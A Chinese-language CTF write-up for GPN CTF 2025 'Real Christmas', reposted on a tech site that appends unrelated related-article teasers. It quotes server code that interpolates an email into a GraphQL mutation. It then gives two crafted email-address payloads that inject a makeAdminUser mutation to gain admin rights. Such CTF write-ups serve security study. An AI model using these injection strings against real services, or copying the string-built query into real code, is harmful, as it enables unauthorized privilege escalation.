GraphQL注入 -- GPN CTF 2025 Real Christmas

part 1

服务器会每段时间禁用已注册的账号,此处存在漏洞

def deactivate_user_graphql(email):graphql_endpoint = current_app.config["GRAPHQL_ENDPOINT"]query = f"""mutation {{deactivateUser (user: {{email: "{email}"}}){{   success             }}}}"""

服务器后端拥有一个提升权限的功能

# 设为管理员的Mutation
class MakeAdminUser(Mutation):class Meta:description = "Mutation to make a user an admin"  # 设为管理员的描述class Arguments:user = UserInput(required=True)  # 必须提供用户输入success = Boolean()  # 是否成功message = String()  # 返回信息def mutate(self, info, user):# 权限校验if (not info.context.headers.get("Key")== current_app.config["SERVICE_TOKEN_KEY"]):return MakeAdminUser(success=False, message="Unauthorized")# 查找用户db_user = Noneif user.get("id") is not None:db_user = User.query.filter_by(id=user.get("id")).first()elif user.get("email") is not None:db_user = User.query.filter_by(email=user.get("email")).first()if not db_user:return MakeAdminUser(success=False, message="User not found")db_user.is_admin = True  # 设为管理员db.session.commit()return MakeAdminUser(success=True, message="User made admin successfully")

根据 RFC 规范,电子邮件地址的本地部分(@ 前的部分)可以包含以下字符:

  • 大小写字母 (a-z, A-Z)
  • 数字 (0-9)
  • 特殊字符:!#$%&'*±/=?^_{|}~`
  • 使用引号括起来的字符串,可以包含空格和更多特殊字符

由此写出

"}){success}makeAdminUser(user: {id: 1}){#"@a.com

part 2

我们无法再传递id为参数,我们无法再利用邮箱前方,但是可以构造畸形的域名

a@["}) { success } makeAdminUser(user: {email: "(\")a@b.c"}) { #].c

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/web/86384.shtml
繁体地址,请注明出处:http://hk.pswp.cn/web/86384.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【机器学习深度学习】非线性激活函数

目录 前言 一、什么是激活函数? 1.1 作用 二、如果没有激活函数,会发生什么? 2.1 先看一张图理解“线性”的局限 2.2 核心认知:为什么非线性如此重要? 三、非线性激活函数到底解决了什么问题? 1. 引…

国外开源客服系统chathoot部署,使用教程

目录 一、系统版本要求: 二、部署步骤 2.1 安装docker 和docker-compose 2.2 准备docker-compose.yaml 2.3 初始化数据库 2.4 安装nginx 2.6 启动项目 三、使用教程 一、系统版本要求: linux ubuntu 22.042核4G 40GB(或以上&#xf…

什么是回归测试?什么时候需要做回归测试?

回归测试详解:概念、时机与最佳实践 1. 什么是回归测试? 回归测试(Regression Testing) 是指在对软件进行修改(如修复Bug、新增功能、优化代码)后,重新执行已有测试用例,以确保&am…

Android-Layout Inspector使用手册

Layout Inspector Android Layout Inspector 是 Android Studio 中用于调试应用布局的工具 启动方法: 通过下载Layout Inspector插件,在 “View - Tool Windows - Layout Inspector” 或 “Tools - Layout Inspector” 启动。 主要界面区域&#xff1a…

postgreSQL 数据库字典导出工具

为满足项目验收文档需求,开发了一个基于Python的PostgreSQL数据字典导出工具。 废话不多说,先分享一下 软件截图 数据字典文件样式,文件格式为docx 软件源码 基于python开发, import tkinter as tk from tkinter import ttk, messagebox …

【AI解析】 CppNumericalSolvers:一个现代化的 C++17 纯头文件优化库 示例代码解析

一个轻量级仅头文件的 C17 库,提供针对(无)约束非线性函数及表达式模板的数值优化方法 https://github.com/PatWie/CppNumericalSolvers CppNumericalSolvers 库 include 目录下的文件及其功能说明 根目录文件 文件名功能说明function.h(主函…

第3篇:Gin的请求处理——获取客户端数据(Gin文件上传,接收JSON数据)

引言:Context是Gin的"瑞士军刀" 在Gin框架中,Context就像一把多功能的瑞士军刀,封装了所有与请求相关的操作。新手开发者常犯的错误是只把它当作参数传递的工具,却忽略了它强大的数据处理能力。 想象一个场景&#xf…

启动hardhat 项目,下载依赖的npm问题

Windows 环境 Hardhat 依赖安装问题排查指南 🚨 问题描述 在 Windows 环境下安装 Hardhat 项目依赖时,遇到以下错误: npm ERR! code ETARGET npm ERR! notarget No matching version found for nomicfoundation/edr^0.11.1. npm ERR! nota…

大数据里的拉链表:数据版本管理的时间胶囊

哈喽各位数据打工人~今天咱们来聊聊大数据领域一个超实用的神器 ——拉链表!听起来像时尚单品?NoNoNo,它可是数据仓库里管理历史数据的宝藏工具✨ 就算你是刚入门的小白也能轻松听懂,咱们全程少玩比喻多讲人话&#xf…

docker执行yum报错Could not resolve host: mirrorlist.centos.org

解决办法: -- 依次执行以下命令cd /etc/yum.repos.d/sed -i s|#baseurlhttp://mirror.centos.org|baseurlhttp://vault.centos.org|g /etc/yum.repos.d/CentOS-*sed -i s/mirrorlist/#mirrorlist/g /etc/yum.repos.d/CentOS-*yum update -yecho "export LC_ALL…

JVM OutOfMemoryError原因及排查解决方案

在Java后端开发中,java.lang.OutOfMemoryError(简称OOM)是一个令开发者头疼的异常。它通常意味着Java虚拟机(JVM)在尝试分配新对象时,发现堆中没有足够的空间来容纳该对象,或者其他内存区域耗尽…

吐槽之前后端合作开发

大家好,我是佳瑞,从事10多年java开发程序员,爆照一张,存活互联网。 也做过vue开发自己的网站,觉得前端是真比后端开发轻松很多,就是画页面调样式,打包发布,当然不说是高级源码修改…

Oracle LogMiner日志分析工具介绍

Oracle LogMiner日志分析工具介绍 LogMiner使用须知LogMiner字典使用online catalog作为日志挖掘字典使用redo日志文件作为日志挖掘字典使用文本文件作为日志挖掘字典Redo日志文件自动获取日志文件手动获取日志文件启动LogMiner进行分析V$LOGMNR_CONTENTS视图LogMiner使用须知 …

2-4 Dockerfile指令(个人笔记)

以下指令基于 ubuntu Dockerfile整体示例 From:设置基础镜像 Maintainer :镜像维护者信息 COPY/ADD:添加本地文件到镜像中 WorkDir:设置工作目录 Run:执行命令 CMD/EntryPoint:配置容器启动时执行的命令

Redis主从架构哨兵模式

文章目录 概述一、主从搭建实例二、主从同步原理三、哨兵架构3.1、搭建哨兵架构3.2、演示故障恢复3.3、哨兵日志 概述 在生产环境下,Redis通常不会单机部署,为了保证高可用性,通常使用主从模式或集群架构,同时也面临着一些问题&am…

基于深度学习yolov5的安全帽实时识别检测系统

摘要:在现代工业和建筑行业中,确保员工的安全是至关重要的一环。安全帽作为一项基础的个人防护设备,对于降低头部受伤的风险发挥着关键作用。然而,确保工作人员在施工现场始终正确佩戴安全帽并非易事。传统的人工检查方法不仅效率…

GitLab 18.1 发布 Runner、无效的个人访问令牌查看等功能,可升级体验!

GitLab 是一个全球知名的一体化 DevOps 平台,很多人都通过私有化部署 GitLab 来进行源代码托管。极狐GitLab 是 GitLab 在中国的发行版,专门为中国程序员服务。可以一键式部署极狐GitLab。 学习极狐GitLab 的相关资料: 极狐GitLab 官网极狐…

量子计算与AI融合 - 企业级安全威胁应对

量子计算(QC)虽带来万亿级市场机遇(2025-2035年),但潜藏重大安全风险:可能破解现有加密系统,催生"现在窃取,未来解密"攻击。美国NIST已启动后量子加密标准,但技…

Excel:filter函数实现动态筛选的方法

filter的意思是“过滤、筛选”,动态筛选,FILTER()函数可以将对筛选区域内容,并将结果自动溢出生成一个新区域,以下是函数的使用方法: (一)情景:给定两列数据,我需要根据…

兰洋科技上合组织论坛发表专题分享,全球液冷布局引领绿色算力未来

2025年6月17-19日,中国—上海合作组织数字技术合作发展论坛在新疆克拉玛依市举办。作为第四次上海合作组织成员国信息通信技术发展部门负责人会议的配套会议,论坛以“数字化转型助力可持续发展,数字包容促进上合共同繁荣”为主题,…